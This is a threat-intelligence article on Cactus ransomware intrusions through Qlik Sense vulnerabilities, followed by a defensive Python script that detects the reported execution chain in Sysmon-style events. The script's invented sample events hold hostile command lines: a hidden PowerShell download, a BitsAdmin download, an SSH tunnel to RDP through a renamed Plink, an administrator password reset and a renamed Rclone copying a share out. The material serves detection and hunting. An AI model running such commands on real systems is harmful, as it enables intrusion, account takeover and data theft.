Cactus Ransomware Strikes Through Qlik Sense Vulnerabilities
Operators of the Cactus ransomware gained initial access by exploiting vulnerabilities in Qlik Sense, a business analytics platform, and then deployed their ransomware. Ongoing incident response investigations by Arctic Wolf Labs' forensic and threat intelligence researchers provide the first insights into this developing threat. Three Qlik Sense vulnerabilities were exploited for initial access: CVE-2023-41266, a path traversal; CVE-2023-41265, an HTTP request tunneling flaw; and CVE-2023-48365, an unauthenticated remote code execution flaw disclosed after the fix for the first two was found to be incomplete. Of the post-exploitation phase that followed, the Arctic Wolf researchers note that "the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes."
In the intrusions examined, the Scheduler service was abused to launch native Windows tooling such as PowerShell or BitsAdmin, which downloaded remote-access tools such as AnyDesk or Plink, often saved to disk under other file names. Before deploying the ransomware, the operators ran discovery commands, uninstalled security monitoring software (Sophos), changed the administrator account password, and used the renamed Plink executable to establish an RDP tunnel. Rclone was used to exfiltrate data. Arctic Wolf stresses that its incident response investigation is ongoing, and attributes the activity to Cactus ransomware operators on the basis of overlapping tactics, techniques, and procedures (TTPs) across the intrusions, each of which culminated in the deployment of Cactus ransomware.
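The execution chain above (Scheduler.exe spawning PowerShell or BitsAdmin, renamed Plink and Rclone binaries, an SSH tunnel to RDP, an administrator password reset) is a set of behaviours a defender can hunt for in process-creation telemetry. The following is an added example written for this article, not code from Arctic Wolf or from Qlik: a small triage script that runs those checks over process-creation events shaped like Sysmon Event ID 1 (the field names Image, ParentImage, OriginalFileName and CommandLine are Sysmon's). All sample events are constructed for the example; the Qlik install path, the file names the tools were renamed to, the TEST-NET-3 addresses and the command lines are assumptions, not indicators from any incident.

```python
import re

# Constructed Sysmon-style process-creation events for this example. Paths, renamed
# file names, addresses (203.0.113.0/24 is TEST-NET-3) and arguments are invented.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\services.exe",           # benign: service start
     "Image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "OriginalFileName": "Scheduler.exe",
     "CommandLine": r'"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe"'},
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r'powershell.exe -nop -w hidden -c "iwr http://203.0.113.10/a.exe -OutFile C:\Windows\Temp\a.exe"'},
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://203.0.113.10/ad.exe C:\Windows\Temp\ad.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",                     # benign: interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r'"powershell.exe" -NoExit'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",                 # renamed Plink, reverse tunnel to RDP
     "Image": r"C:\Windows\Temp\p.exe",
     "OriginalFileName": "Plink",
     "CommandLine": r"p.exe -ssh -batch -R 3390:127.0.0.1:3389 svc@203.0.113.20"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",                 # administrator password reset
     "Image": r"C:\Windows\System32\net.exe",
     "OriginalFileName": "net.exe",
     "CommandLine": r"net user Administrator P@ssw0rd!"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",                 # renamed Rclone, bulk copy out
     "Image": r"C:\Windows\Temp\rc.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": r"rc.exe copy C:\Shares\Finance remote:bucket --transfers 8"},
]

LOLBINS = {"powershell", "pwsh", "cmd", "bitsadmin"}   # children the report describes under Scheduler.exe
REMOTE_TOOLS = {"plink", "anydesk", "rclone"}           # tools observed renamed on disk
# SSH port forward (-R or -L) whose far end is 3389, i.e. a tunnel to RDP, regardless of binary name.
RDP_FORWARD = re.compile(r"-[RL]\s*[\w.\[\]:]*:3389\b")
# "net user Administrator <newpassword>" (an argument starting with / is an account option, not a password).
ADMIN_PW_CHANGE = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+administrator\s+(?!/)\S+", re.I)


def stem(path: str) -> str:
    """Lower-case file name without directory or extension; tolerates Windows paths."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name.rsplit(".", 1)[0] if "." in name else name


def analyze(event: dict) -> list:
    """Return the list of findings for one process-creation event (empty if nothing matched)."""
    findings = []
    parent, image = stem(event.get("ParentImage", "")), stem(event.get("Image", ""))
    orig, cmd = stem(event.get("OriginalFileName", "")), event.get("CommandLine", "")

    # 1. Qlik Sense Scheduler spawning PowerShell/BitsAdmin/cmd. Only the file name is checked
    #    here; in production also pin the parent to the site's actual Qlik install path.
    if parent == "scheduler" and image in LOLBINS:
        findings.append("qlik_scheduler_spawned_" + image)

    # 2. Renamed remote-access or exfil tooling: the PE version resource (OriginalFileName)
    #    still names the real tool while the on-disk name differs.
    if orig in REMOTE_TOOLS and orig != image:
        findings.append(f"renamed_{orig}_as_{image}")

    # 3. Plink-style port forward that terminates on 3389 (RDP tunnel).
    if RDP_FORWARD.search(cmd):
        findings.append("rdp_tunnel_over_ssh")

    # 4. Rclone transfer verbs, whatever the binary is called on disk.
    if orig == "rclone" and re.search(r"\b(copy|sync|move)\b", cmd):
        findings.append("rclone_transfer")

    # 5. Built-in administrator password set from the command line.
    if ADMIN_PW_CHANGE.search(cmd):
        findings.append("administrator_password_changed")
    return findings


def triage(events: list) -> dict:
    """Map event index -> findings for every event that produced at least one finding."""
    return {i: hits for i, e in enumerate(events) if (hits := analyze(e))}


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {hits}  <- {SAMPLE_EVENTS[i]['CommandLine'][:60]}")
```

The parent-child rule is the highest-signal check: a scheduler service has no business launching PowerShell or BitsAdmin, so it can be alerted on with little tuning, whereas the renamed-binary and command-line rules catch the later stages even when the operators change file names or hosts.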